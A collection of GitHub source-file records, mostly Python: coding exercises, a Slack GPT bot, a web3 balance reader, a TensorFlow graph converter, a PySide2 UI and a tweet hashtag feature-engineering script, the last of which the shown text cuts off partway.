{"seq_id":"5968767408","text":"'''\nDICTIONARY AND FOR LOOP\n'''\nclientes = {\n    'cliente1':\n    {\n        'blusa': 'cavalera',\n        'calça': 'hering'\n},\n'cliente2':\n    {\n     'blusa':'tommy',\n     'calça':'tommy'\n},\n 'cliente3':\n    {'blusa':'dc',\n     'calça':'tommy'}\n}\n# FOR LOOP\nfor clientes_k, clientes_v in clientes.items():\n    print(f'Showing {clientes_k}')\n    for dados_k, dados_v in clientes_v.items():\n        print(f'\\t{dados_k}={dados_v}')\n\n\n## CONVERT A LIST INTO A DICTIONARY\ndicionario = [\n    [1,'Paulo'],\n    [2,'Carlos'],\n    [3,'Eduardo'],\n    [5, 'Barbara'],\n    [6, 'Felipe'],\n    [7, 'Pedro']\n]\nd5 = {2:'Novo', 3: 'mdb'}\nprint(dicionario)\n## Casting\ndicio = dict(dicionario)\nprint(dicio)\ndicio.pop(1) # Remove a key; you must say which key to remove\nprint(dicio)\ndicio.popitem() ## Remove the last item, whichever item that is\nprint(dicio)\ndicio.update(d5) ## Merge the two dictionaries\nprint(dicio)\n","repo_name":"phmartinsconsult/curso_python_3_luis_otavio","sub_path":"Aula_33_Dicionário_B.py","file_name":"Aula_33_Dicionário_B.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
{"seq_id":"20001311034","text":"\"\"\"51. 
N-Queens\"\"\"\n\nclass Solution(object):\n def solveNQueens(self, n):\n \"\"\"\n :type n: int\n :rtype: List[List[str]]\n \"\"\"\n ## Practice:\n res = []\n nums = [-1]*n\n self.dfs(nums, 0, [], res)\n return res\n\n def dfs(self, nums, index, path, res):\n if index == len(nums): #触发结束条件:index(row) 超过 path(4) 的最后一行\n res.append(path)\n return\n for i in range(len(nums)):\n nums[index] = i\n if self.valid(nums, index): #排除不合法选择\n tmp = \".\"*len(nums)\n self.dfs(nums, index+1, path + [str(tmp[:i]+'Q'+tmp[i+1:])], res)\n\n def valid(self, nums, index):\n for i in range(index):\n #检查左上方是否有皇后互相冲突 or 检查列是否有皇后互相冲突\n if abs(nums[index]-nums[i])==index-i or nums[index]==nums[i]:\n return False\n return True\n\n ##\n\n res = []\n self.dfs([-1]*n, 0, [], res)\n return res\n\n def dfs(self, nums, index, path, res):\n if index == len(nums):\n res.append(path)\n return\n\n for i in range(len(nums)):\n nums[index] = i\n if self.valid(nums, index):\n tmp = \".\"*len(nums)\n self.dfs(nums, index+1, path + [str(tmp[:i]+\"Q\"+tmp[i+1:])], res)\n\n def valid(self, nums, n):\n for i in range(n):\n if abs(nums[i]-nums[n]) == n - i or nums[i] == nums[n]:\n return False\n\n return True\n","repo_name":"wilbertgeng/LeetCode_exercise","sub_path":"51.py","file_name":"51.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11265764688","text":"from gql import gql\nfrom typing import Sequence\n\nclass getMethods:\n\n _GetGlobalPolicyFunctionQuery = \"\"\"\n query GetGlobalPolicyFunction($gpfn: String!) {\n GlobalPolicyFunctions(where: {name: {_eq: $gpfn}}) {\n name\n function\n id\n }\n}\n \"\"\"\n\n def GetGlobalPolicyFunction(self, gpfn: str):\n query = gql(self._GetGlobalPolicyFunctionQuery)\n variables = {\n \"gpfn\": gpfn,\n }\n operation_name = \"GetGlobalPolicyFunction\"\n return self.execute(query, variable_values=variables, operation_name=operation_name)\n","repo_name":"kivera-io/python-client","sub_path":"kivera/globalpolicyfunctions/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"32915395788","text":"from web3 import Web3\nimport contracts.doe_token_abi as doe_token_abi\n\n\ndef get_main_balance(w3, wallet):\n contract_address = \"0xf8E9F10c22840b613cdA05A0c5Fdb59A4d6cd7eF\"\n contract = w3.eth.contract(address=contract_address, abi=doe_token_abi.get_abi())\n balanceOf = contract.functions.balanceOf(wallet).call()\n return Web3.fromWei(balanceOf, 'ether')\n\ndef get_arb_balance(w3, wallet):\n contract_address = \"0xE71Db7a96daB25cDb9f4cbC7F686da02192B0E88\"\n contract = w3.eth.contract(address=contract_address, abi=doe_token_abi.get_abi())\n balanceOf = contract.functions.balanceOf(wallet).call()\n return Web3.fromWei(balanceOf, 'ether')\n","repo_name":"pettitpeon/doe-nft-contract","sub_path":"contracts/doe_token_contract.py","file_name":"doe_token_contract.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"70832622921","text":"#!/usr/bin/env python3\n\nimport sys\nfrom functools import reduce\nimport operator\nimport math\n\nfilename = sys.argv[1]\n\nimport tensorflow as tf\nfrom tensorflow.core.framework import graph_pb2\nimport numpy\n\ngraph_def = graph_pb2.GraphDef()\ngraph_def.ParseFromString(open(filename, mode='rb').read())\ntf.import_graph_def(graph_def)\ngraph = 
tf.compat.v1.get_default_graph()\n\nfirst = True\npaddings = {}\n\nprint('ml.Layer.input_bias = False')\n\ndef output(op, layer, prev_input=True):\n global first\n print('named[\"%s\"] = %s' % (op.name, layer))\n print('layers.append(named[\"%s\"])' % op.name)\n if prev_input and not first:\n print('named[\"%s\"].inputs = [named[\"%s\"]]' % (op.name,\n op.inputs[0].name[:-2]))\n first = False\n\ndef link(dest, source):\n print('named[\"%s\"] = named[\"%s\"]' % (dest.name, source.name))\n\ndef source(dest):\n print('named[\"%s\"] = None' % dest.name)\n\ndef activate_bias(op):\n print('named[\"%s\"].input_bias = True' % op.name)\n\ndef get_shape(shape):\n res = []\n for x in shape:\n try:\n res.append(int(x))\n except:\n res.append(1)\n return res\n\ndef get_valid_padding(input_shape, window, strides):\n return [int(math.ceil((x - y + 1) / z))\n for x, y, z in zip(input_shape, window, strides)]\n\nfor op in graph.get_operations():\n if op.inputs:\n shape = get_shape(op.inputs[0].shape)\n else:\n shape = None\n t = op.type\n if t in ('VariableV2', 'Const', 'Assign', 'NoOp', 'Fill', 'VarHandleOp'):\n source(op)\n elif t in ('Reshape', 'Squeeze', 'Identity', 'VarIsInitializedOp', 'ReadVariableOp',\n 'AssignVariableOp'):\n link(op, op.inputs[0].op)\n elif t == 'Placeholder':\n source(op)\n elif t == 'MatMul':\n #print (op.inputs[0].shape)\n assert reduce(operator.mul, shape) == op.inputs[1].shape[0]\n output(op, 'ml.Dense(1, %d, %d)' % (op.inputs[1].shape[0],\n op.inputs[1].shape[1]))\n shape = [1, int(op.inputs[1].shape[1])]\n elif t == 'Conv2D':\n strides = op.get_attr('strides')\n assert len(strides) == 4\n assert strides[0] == 1\n assert strides[3] == 1\n strides = tuple(strides[1:3])\n input_shape = get_shape(op.inputs[0].shape)\n assert len(input_shape) == 4\n window = [int(x) for x in op.inputs[1].shape]\n padding = op.get_attr('padding').decode('u8')\n if padding not in ('SAME', 'VALID'):\n padding = get_shape(padding)\n if op.inputs[0].op.name in paddings:\n assert padding == 'VALID'\n input_shape = get_shape(op.inputs[0].op.inputs[0].shape)\n p = paddings.pop(op.inputs[0].op.name)\n for i in 0, 6:\n assert p[i] == 0\n padding = [p[2], p[4]]\n output_shape = get_shape(op.outputs[0].shape)\n assert len(output_shape) == 4\n output(op, 'ml.FixConv2d(%s, %s, %s, %s, %s, %s, True, '\n 'inputs=[named[\"%s\"]])' % \\\n (input_shape, tuple(window), (window[3],), output_shape, strides,\n repr(padding), op.inputs[0].op.name))\n elif t in ('Add', 'AddV2') and op.inputs[1].op.type != 'VariableV2':\n output(op, 'ml.Add([%s])' % ','.join('named[\"%s\"]' % x.op.name\n for x in op.inputs), False)\n elif t in ('Add', 'BiasAdd'):\n assert op.inputs[0].op.type in ('MatMul', 'Conv2D')\n activate_bias(op.inputs[0].op)\n link(op, op.inputs[0].op)\n elif t == 'Relu':\n assert len(op.inputs) == 1\n output(op, 'ml.Relu(%s, inputs=[named[\"%s\"]])' % (shape,\n op.inputs[0].op.name))\n elif t == 'Square':\n output(op, 'ml.Square(%s)' % (shape,))\n elif t == 'MaxPool':\n strides = op.get_attr('strides')\n ksize = op.get_attr('ksize')\n padding = str(op.get_attr('padding').decode('u8'))\n output(op, 'ml.MaxPool(%s, %s, %s, \"%s\")' % (shape, strides, ksize,\n padding))\n elif t == 'AvgPool':\n filter_size = op.get_attr('ksize')\n assert len(filter_size) == 4\n assert filter_size[0] == 1\n assert filter_size[-1] == 1\n input_shape = get_shape(op.inputs[0].shape)\n strides = get_shape(op.get_attr('strides'))\n assert strides[0] == 1\n assert strides[3] == 1\n padding = op.get_attr('padding').decode('u8')\n if padding 
== 'VALID':\n output_shape = get_valid_padding(input_shape, filter_size, strides)\n elif padding == 'SAME':\n output_shape = [int(math.ceil(x / y))\n for x, y in zip(input_shape, filter_size)]\n else:\n raise Exception('unknown padding type: %s' % padding)\n output(op, 'ml.FixAveragePool2d(%s, %s, %s, %s)' %\n (input_shape, output_shape, filter_size[1:3], strides[1:3]))\n elif t == 'ArgMax':\n assert len(op.inputs) == 2\n shape = get_shape(op.inputs[0].shape)\n dim = int(op.inputs[1].op.get_attr('value').int_val[0])\n for i in range(1, len(shape)):\n if i != dim:\n assert shape[i] == 1\n output(op, 'ml.Argmax((1, %s))' % shape[dim])\n elif t == 'ConcatV2':\n assert len(op.inputs) == 3\n dim = int(op.inputs[2].op.get_attr('value').int_val[0])\n output(op, 'ml.Concat([%s], %s)' % (\n ','.join('named[\"%s\"]' % x.name[:-2] for x in op.inputs[:2]), dim),\n prev_input=False)\n elif t in ('FusedBatchNorm', 'FusedBatchNormV3'):\n output(op, 'ml.FusedBatchNorm(%s, inputs=[named[\"%s\"]])' %\n (get_shape(op.inputs[0].shape), op.inputs[0].op.name))\n elif t == 'Pad':\n paddings[op.name] = numpy.fromstring(op.inputs[1].op.get_attr('value').\n tensor_content, 'int32').tolist()\n link(op, op.inputs[0].op)\n else:\n raise Exception('unknown type: %s' % t)\n\nif paddings:\n raise Exception('padding layers only supported before valid convolution:',\n paddings)\n","repo_name":"PlatONnetwork/proof_of_custody","sub_path":"Scripts/process-tf.py","file_name":"process-tf.py","file_ext":"py","file_size_in_byte":6230,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"63"} +{"seq_id":"34471168130","text":"\nimport sys\nfrom PySide2 import QtWidgets\n\n# from other py files\nfrom csvviewui import TreeMain\nfrom treeanalysis import Classification\n\n\nclass DataVisualisationApp(QtWidgets.QWidget):\n def __init__(self, parent=None):\n super(DataVisualisationApp, self).__init__(parent)\n\n self.filepath = \\\n '/Users/johnwondoh/PycharmProjects/untitled1/pyside_project/graduate-admissions/Admission_Predict.csv'\n\n # Setting up visualisation\n self.plots = Classification(self.filepath)\n self.plots.decision_tree()\n self.plots.scatter_plots()\n\n self.grid = QtWidgets.QGridLayout()\n\n self.btn_QTreeWidget = QtWidgets.QPushButton('Use QTreeWidget')\n self.btn_QTreeView = QtWidgets.QPushButton('Use QTreeView')\n self.btn_decision_tree = QtWidgets.QPushButton('Decision Tree')\n self.btn_scatter_plot = QtWidgets.QPushButton('Scatter Plot')\n\n # set the style sheet for when the buttons are clicked\n self.set_clicked_style = 'QPushButton {' \\\n 'width: 100px;' \\\n 'background-color: #4286f4; ' \\\n 'border-radius: 2px;' \\\n '}'\n\n self.tree = TreeMain(self.filepath)\n\n # create placeholders to be added to the grid\n self.placeholder1 = QtWidgets.QLabel()\n self.placeholder1.setText('Select method to view the data')\n\n self.placeholder2 = QtWidgets.QLabel()\n self.placeholder2.setText('Select your preferred visualisation type')\n # self.img_tree = self.tree.view_img()\n\n self.grid_ui()\n\n # make connections to buttons\n self.btn_QTreeWidget.clicked.connect(self.on_click_QTreeWidget)\n self.btn_QTreeView.clicked.connect(self.on_click_QTreeView)\n self.btn_decision_tree.clicked.connect(self.on_click_decision_tree)\n self.btn_scatter_plot.clicked.connect(self.on_click_scatter_plot)\n\n def grid_ui(self):\n self.grid.setColumnStretch(0, 0)\n self.grid.setColumnStretch(1, 4)\n # grid.setRowStretch(, int stretch)\n\n self.grid.addWidget(self.buttons_for_trees(), 0, 0)\n 
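# (Editor's note, added) QGridLayout.addWidget(widget, row, column): column 0\n        # stacks the two button groups, column 1 holds the data view (row 0) and the\n        # plot area (row 1); setColumnStretch(1, 4) above lets column 1 absorb the\n        # extra horizontal space.\n        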
self.grid.addWidget(self.buttons_for_visualisation(), 1, 0)\n self.grid.addWidget(self.placeholder1, 0, 1)\n self.grid.addWidget(self.placeholder2, 1, 1)\n self.setLayout(self.grid)\n\n self.setWindowTitle(\"PyQt5 Group Box\")\n self.resize(1000, 800)\n\n def buttons_for_trees(self):\n tree_button_layout = QtWidgets.QVBoxLayout()\n tree_button_layout.addWidget(self.btn_QTreeWidget)\n tree_button_layout.addWidget(self.btn_QTreeView)\n tree_button_layout.addStretch(1)\n\n tree_buttons = QtWidgets.QGroupBox('Select Tree View Type')\n tree_buttons.setLayout(tree_button_layout)\n return tree_buttons\n\n def buttons_for_visualisation(self):\n v_button_layout = QtWidgets.QVBoxLayout()\n v_button_layout.addWidget(self.btn_decision_tree)\n v_button_layout.addWidget(self.btn_scatter_plot)\n v_button_layout.addStretch(1)\n\n v_buttons = QtWidgets.QGroupBox('Select Visualisation type Type')\n v_buttons.setLayout(v_button_layout)\n return v_buttons\n\n def createExampleGroup(self):\n groupBox = QtWidgets.QGroupBox(\"Best Food\")\n\n radio1 = QtWidgets.QRadioButton(\"&Radio pizza\")\n radio2 = QtWidgets.QRadioButton(\"R&adio taco\")\n radio3 = QtWidgets.QRadioButton(\"Ra&dio burrito\")\n\n radio1.setChecked(True)\n\n vbox = QtWidgets.QVBoxLayout()\n vbox.addWidget(radio1)\n vbox.addWidget(radio2)\n vbox.addWidget(radio3)\n vbox.addStretch(1)\n groupBox.setLayout(vbox)\n\n return groupBox\n\n # actions\n # @pyqtSlot()\n def on_click_QTreeView(self):\n # toggling button clicked\n self.btn_QTreeView.setStyleSheet(self.set_clicked_style)\n self.btn_QTreeWidget.setStyleSheet('')\n\n # add widget\n view = self.grid.itemAtPosition(0, 1).widget()\n view.setParent(None)\n new_tree_view = self.tree.get_tree_view()\n self.grid.addWidget(new_tree_view, 0, 1)\n\n def on_click_QTreeWidget(self):\n self.btn_QTreeWidget.setStyleSheet(self.set_clicked_style)\n self.btn_QTreeView.setStyleSheet('')\n\n widget = self.grid.itemAtPosition(0, 1).widget()\n widget.setParent(None)\n new_tree_widget = self.tree.get_tree_widget()\n self.grid.addWidget(new_tree_widget, 0, 1)\n\n def on_click_decision_tree(self):\n self.btn_decision_tree.setStyleSheet(self.set_clicked_style)\n self.btn_scatter_plot.setStyleSheet('')\n\n img_widget = self.grid.itemAtPosition(1, 1).widget()\n img_widget.setParent(None)\n\n new_img_box = QtWidgets.QGroupBox(\"Visualise Decision Tree\")\n new_img = self.tree.view_tree_plot_img()\n new_img_box.setLayout(new_img)\n self.grid.addWidget(new_img_box, 1, 1)\n\n def on_click_scatter_plot(self):\n self.btn_scatter_plot.setStyleSheet(self.set_clicked_style)\n self.btn_decision_tree.setStyleSheet('')\n\n img_widget = self.grid.itemAtPosition(1, 1).widget()\n img_widget.setParent(None)\n\n new_img_box = QtWidgets.QGroupBox(\"Visualise Scatter Plot\")\n new_img = self.tree.view_scatter_plot_img()\n new_img_box.setLayout(new_img)\n self.grid.addWidget(new_img_box, 1, 1)\n\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n clock = DataVisualisationApp()\n clock.show()\n sys.exit(app.exec_())\n","repo_name":"johnwondoh/Data_Visualisation_UI_with_PySide2","sub_path":"project_main.py","file_name":"project_main.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"31279983390","text":"import sys\nsys.stdin = open(\".\\Algorithm_Study\\BOJ0509\\BOJ1799\",\"r\")\ninput = sys.stdin.readline\n\nN = int(input())\nboard = [list(map(int, input().split())) for _ in range(N)]\n\nlarr = []\nrarr = []\nfor 
i in range(N) :\n for j in range(N) :\n if board[i][j] == 1 :\n if i+j % 2 :\n larr.append((i,j))\n else :\n rarr.append((i,j))\nmx = 0 \nprint(larr)\nprint(rarr)\n\ndef backtracking(i, check ) :\n global mx \n if i == len(arr) :\n mx = max(mx, check.count(1))\n return\n if check[i] :\n base = check[i]\n backtracking(i+1, check)\n check[i] = base\n else :\n check[i] = 1\n for j in range(len(arr)) :\n if i == j :\n continue\n if abs(arr[i][0]-arr[j][0]) == abs(arr[i][1]-arr[j][1]) :\n check[j] = -1 \n backtracking(i+1, check)\n check[i] = 0\n backtracking(i+1, check)\n\n\ncheck = [0] * len(larr)\narr = larr\nbacktracking(0, check)\nprint(mx)\nans = mx\n\nmx = 0\narr = rarr \ncheck = [0] * len(rarr)\nbacktracking(0, check)\nans += mx\nprint(mx)\nprint(ans)\n\n\n##############\n\nn=int(input())\n\nchess_map=[]\nblack=[]\nwhite=[]\ncolor=[[0]*n for _ in range(n)]\n\nfor i in range(n):\n for j in range(n):\n color[i][j]=(i % 2 == 0 and j % 2 == 0) or (i % 2 != 0 and j % 2 != 0)\n\nfor i in range(n):\n chess_map.append(list(map(int, input().split())))\n for j in range(n):\n # True가 검은색\n if chess_map[i][j]==1 and color[i][j]==1:\n black.append((i,j))\n # False가 흰색\n if chess_map[i][j]==1 and color[i][j]==0:\n white.append((i,j))\n\n# 검은색인 경우\nBcnt=0\n# 흰색인 경우\nWcnt=0\n\nisused01=[0]*(n*2-1)\nisused02=[0]*(n*2-1)\n\ndef fun(bishop,index,count):\n global Bcnt, Wcnt\n if index==len(bishop):\n rx,ry=bishop[index-1]\n # 블랙이면 Bcnt 최대값\n if color[rx][ry]:\n Bcnt=max(Bcnt,count)\n # 흰색이면 Wcnt 최대값\n else:\n Wcnt=max(Wcnt,count)\n return\n\n x,y=bishop[index]\n if isused01[x+y] or isused02[x-y+n-1]:\n fun(bishop,index+1,count)\n else:\n isused01[x+y]=1\n isused02[x-y+n-1]=1\n fun(bishop,index+1,count+1)\n isused01[x+y]=0\n isused02[x-y+n-1]=0\n fun(bishop,index+1,count)\n\nif len(black)>0:\n fun(black,0,0)\nif len(white)>0:\n fun(white,0,0)\nprint(Bcnt+Wcnt)","repo_name":"BenchleyKim/Study","sub_path":"Algorithm_Study/2021MAY/BOJ0509/BOJ1799.py","file_name":"BOJ1799.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18618489562","text":"def intreverse(n):\r\n\tr=0\r\n\twhile(n > 0):\r\n\t lastDig = n %10\r\n\t r = r *10 + lastDig\r\n\t n = n //10\r\n\treturn r \r\ndef matched(str):\r\n count = 0\r\n for i in str:\r\n if i == \"(\":\r\n count += 1\r\n elif i == \")\":\r\n count -= 1\r\n if count < 0:\r\n return False\r\n return count == 0\r\ndef sumprimes(l):\r\n s=0 \r\n m=len(l)\r\n for i in range(0,m):\r\n num=l[i]\r\n if(num>1):\r\n prime=\"true\" \r\n for j in range(2,num):\r\n if num%j==0:\r\n prime=\"false\"\r\n break\r\n if prime==\"true\":\r\n s=s+num \r\n return(s)\r\nimport ast\r\n\r\ndef tolist(inp):\r\n inp = \"[\"+inp+\"]\"\r\n inp = ast.literal_eval(inp)\r\n return (inp[0],inp[1])\r\n\r\ndef parse(inp):\r\n inp = ast.literal_eval(inp)\r\n return (inp)\r\n\r\nfncall = input()\r\nlparen = fncall.find(\"(\")\r\nrparen = fncall.rfind(\")\")\r\nfname = fncall[:lparen]\r\nfarg = fncall[lparen+1:rparen]\r\n\r\nif fname == \"intreverse\":\r\n arg = parse(farg)\r\n print(intreverse(arg))\r\nelif fname == \"matched\":\r\n arg = parse(farg)\r\n print(matched(arg))\r\nelif fname == \"sumprimes\":\r\n arg = parse(farg)\r\n print(sumprimes(arg))\r\nelse:\r\n print(\"Function\", fname, 
\"unknown\")\r\n\r\n","repo_name":"JAYESH1117/codes","sub_path":"code_python001.py","file_name":"code_python001.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"37140662259","text":"\"\"\"\n고정점 찾기\ninput :\n7\n-15 -4 2 8 9 13 15\n\noutput :\n2\n\"\"\"\n\nimport sys\nsys.stdin = open(\"input.txt\", \"r\")\ninput = sys.stdin.readline\n\nN = int(input())\nnum_list = list(map(int, input().split()))\n\ndef binary_search():\n l = 0\n r = N - 1\n while l <= r:\n mid = (l + r) // 2\n if mid == num_list[mid]:\n print(mid)\n return\n elif mid > num_list[mid]:\n l = mid + 1\n else: # mid < num_list[mid]\n r = mid - 1\n print(-1)\n return\n\nbinary_search()\n","repo_name":"AlphaTechnic/Algorithm_Study","sub_path":"2021_self_algorithm_study_with_python/binary_search_p2.py","file_name":"binary_search_p2.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43847910787","text":"import os\nimport openai\nfrom slack_bolt import App\nfrom flask import Flask, request\nfrom slack_bolt.adapter.flask import SlackRequestHandler\n\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\napp = App(\n token=os.environ.get(\"SLACK_BOT_TOKEN\"),\n signing_secret=os.environ.get(\"SLACK_SIGNING_SECRET\")\n)\n\nflask_app = Flask(__name__)\nhandler = SlackRequestHandler(app)\n\n\ndef generate_prompt(prompt) -> str:\n return prompt\n\n\ndef ask_gpt(prompt) -> str:\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=generate_prompt(prompt),\n temperature=0.6,\n max_tokens=250,\n )\n return response\n\n\n@app.event(\"app_mention\")\ndef handle_gpt_mention(body, say, logger):\n logger.info(body)\n print(body)\n response = ask_gpt(body[\"event\"][\"text\"])\n logger.info(response)\n print(response.choices)\n say(str(response.choices[0].text))\n\n\n@flask_app.route(\"/slack/events\", methods=[\"POST\"])\ndef slack_events():\n return handler.handle(request)\n\n\n@flask_app.route(\"/\")\ndef index():\n return \"Success\"\n\n\nif __name__ == \"__main__\":\n app.start(port=int(os.environ.get(\"PORT\", 3000)))\n","repo_name":"GoatedChopin/gpt-slack-bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23427251923","text":"#!/usr/bin/env python\n\n__author__ = \"Mastercard Team\"\n__email__ = \"\"\n__contributors__ = [\"Mastercard Team\", \"Tam Nguyen\"]\n\n\nimport argparse\nimport logging\nimport numpy as np\nimport pandas as pd\nimport time\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.sparse import csr_matrix\nfrom tqdm import tqdm\n\nlogging.basicConfig(\n format=\"%(asctime)s %(levelname)s %(message)s\", level=logging.DEBUG\n)\n\n\ndef read_csv(df_file, feat, nrows=None):\n with open(df_file, \"r\", encoding=\"utf-8\") as f:\n if nrows is None:\n lines = map(lambda x: x.strip(), f.readlines())\n else:\n lines = [next(f) for x in range(nrows)]\n\n df = pd.DataFrame(lines)\n df.columns = [\"name\"]\n df[feat] = df.name.str.split(\"\\t\", expand=True,)\n df.drop(columns=[\"name\"], inplace=True)\n df[\"timestamp\"] = pd.to_datetime(df[\"timestamp\"])\n return df\n\n\ndef load_data(\n train_file=\"../public_dat/train.data\",\n 
validation_file=\"../public_dat/validation.data\",\n test_file=\"../public_dat/test.data\",\n feat_name_file=\"../public_dat/feature.name\",\n sol_file=\"../public_dat/df.solution\",\n nrows=None,\n):\n logging.info(\"loading feature names...\")\n feature_names = open(feat_name_file).readlines()[0].split(\"\\t\")\n logging.info(\"loading labels...\")\n labels = list(map(lambda x: float(x), open(sol_file).readlines()))\n logging.info(\"loading training data...\")\n df = read_csv(train_file, feature_names, nrows)\n df.drop(columns=\"tweet_id\", inplace=True)\n if nrows is not None:\n labels = labels[: df.shape[0]]\n\n logging.info(\"loading validation data...\")\n validation = read_csv(validation_file, feature_names, nrows)\n validation.drop(columns=\"tweet_id\", inplace=True)\n\n logging.info(\"loading test data...\")\n feature_names.remove(\"tweet_id\")\n test = read_csv(test_file, feature_names, nrows)\n\n return df, labels, validation, test\n\n\ndef gen_feature(df):\n df[\"hashtags\"] = df[\"hashtags\"].map(lambda x: \"\" if x == \"null;\" else x)\n df[\"hashtags\"] = df[\"hashtags\"].fillna(\"\")\n df[\"Date\"] = df[\"timestamp\"].map(lambda x: x.date())\n grouped_hashtags = (\n df.groupby(\"Date\")[\"hashtags\"].apply(lambda x: \" \".join(x)).reset_index()\n )\n\n vectorizer = CountVectorizer(binary=True)\n hashtag_age = vectorizer.fit_transform(grouped_hashtags[\"hashtags\"]).todense()\n\n hastag_life = csr_matrix(hashtag_age.sum(axis=0))\n for i in range(1, len(hashtag_age)):\n temp_old = hashtag_age[i - 1]\n temp = hashtag_age[i]\n new_temp = np.where(temp_old > 0, temp_old + 1, 0)\n new_temp = np.where((temp_old == 0) & (temp == 1), 1, new_temp)\n hashtag_age[i] = new_temp\n\n weight_hashtag = np.where(hashtag_age > 0, 1 / np.log1p(hashtag_age), 0)\n\n hashtag_age = csr_matrix(hashtag_age)\n weight_hashtag = csr_matrix(weight_hashtag)\n\n Y = vectorizer.transform(df[\"hashtags\"])\n Y_bool = Y.astype(bool)\n df[\"avg_score\"] = 0\n df[\"max_score\"] = 0\n df[\"count_for_score\"] = 0\n df[\"avg_weighted_score\"] = 0\n df[\"max_weighted_score\"] = 0\n df[\"avg_hashtag_age\"] = 0\n df[\"max_hashtag_age\"] = 0\n df[\"min_hashtag_age\"] = 0\n df[\"max_hashtag_life\"] = 0\n df[\"avg_hashtag_life\"] = 0\n\n ht_count = CountVectorizer().fit_transform(grouped_hashtags[\"hashtags\"])\n\n for date in tqdm(df[\"Date\"].unique()):\n row_index = df[\"Date\"] == date\n val_index = grouped_hashtags[\"Date\"] == date\n Z = Y_bool[row_index.values].multiply(ht_count[val_index.values])\n Z_weighted = Z.multiply(weight_hashtag[val_index.values])\n weights = Y_bool[row_index.values].multiply(weight_hashtag[val_index.values])\n Z_hashtag = Y_bool[row_index.values].multiply(hashtag_age[val_index.values])\n Z_hastag_life = Y_bool[row_index.values].multiply(hastag_life)\n sums = Z.sum(axis=1).A1\n sum_weighted = Z_weighted.sum(axis=1).A1\n weight = weights.sum(axis=1).A1\n counts = np.diff(Z.indptr)\n averages = sums / counts\n df[\"avg_score\"].iloc[row_index.values] = averages\n df[\"max_score\"].iloc[row_index.values] = Z.max(axis=1).A.ravel()\n df[\"avg_weighted_score\"].iloc[row_index.values] = sum_weighted / weight\n df[\"max_weighted_score\"].iloc[row_index.values] = Z_weighted.max(\n axis=1\n ).A.ravel()\n df[\"avg_hashtag_age\"].iloc[row_index.values] = Z_hashtag.sum(\n axis=1\n ).A1 / np.diff(Z_hashtag.indptr)\n df[\"max_hashtag_age\"].iloc[row_index.values] = Z_hashtag.max(axis=1).A.ravel()\n df[\"min_hashtag_age\"].iloc[row_index.values] = weights.max(axis=1).A.ravel()\n 
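# (Editor's note, added) For a CSR matrix Z, np.diff(Z.indptr) is the number of\n        # stored entries per row, so Z.sum(axis=1).A1 / np.diff(Z.indptr) is the mean\n        # over only the hashtags actually present in each tweet.\n        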
df[\"max_hashtag_life\"].iloc[row_index.values] = Z_hastag_life.max(\n axis=1\n ).A.ravel()\n df[\"avg_hashtag_life\"].iloc[row_index.values] = Z_hastag_life.sum(\n axis=1\n ).A1 / np.diff(Z_hastag_life.indptr)\n df[\"count_for_score\"].iloc[row_index.values] = counts\n\n df[\"avg_score\"] = np.where(df[\"avg_score\"].isnull(), 0, df[\"avg_score\"])\n df[\"max_score\"] = np.where(df[\"max_score\"].isnull(), 0, df[\"max_score\"])\n df[\"count_for_score\"] = np.where(\n df[\"count_for_score\"].isnull(), 0, df[\"count_for_score\"]\n )\n df[\"avg_weighted_score\"] = np.where(\n df[\"avg_weighted_score\"].isnull(), 0, df[\"avg_weighted_score\"]\n )\n df[\"max_weighted_score\"] = np.where(\n df[\"max_weighted_score\"].isnull(), 0, df[\"max_weighted_score\"]\n )\n df[\"avg_hashtag_age\"] = np.where(\n df[\"avg_hashtag_age\"].isnull(), 0, df[\"avg_hashtag_age\"]\n )\n df[\"max_hashtag_age\"] = np.where(\n df[\"max_hashtag_age\"].isnull(), 0, df[\"max_hashtag_age\"]\n )\n df[\"min_hashtag_age\"] = np.where(\n df[\"min_hashtag_age\"].isnull(), 0, df[\"min_hashtag_age\"]\n )\n df[\"max_hashtag_life\"] = np.where(\n df[\"max_hashtag_life\"].isnull(), 0, df[\"max_hashtag_life\"]\n )\n df[\"avg_hashtag_life\"] = np.where(\n df[\"avg_hashtag_life\"].isnull(), 0, df[\"avg_hashtag_life\"]\n )\n\n return df\n\n\ndef main(\n train_file,\n valid_file,\n test_file,\n feat_name_file,\n sol_file,\n train_feature_file,\n valid_feature_file,\n test_feature_file,\n):\n nrows = None\n train, labels, validation, test = load_data(\n train_file, valid_file, test_file, feat_name_file, sol_file, nrows=nrows,\n )\n TRN_SET = 0\n VAL_SET = 1\n TST_SET = 2\n train[\"split\"] = TRN_SET\n validation[\"split\"] = VAL_SET\n test[\"split\"] = TST_SET\n\n train[\"LABEL\"] = labels\n validation[\"LABEL\"] = np.nan\n test[\"LABEL\"] = np.nan\n\n logging.info(\"engineering features\")\n df = pd.concat((train, validation, test))\n df = 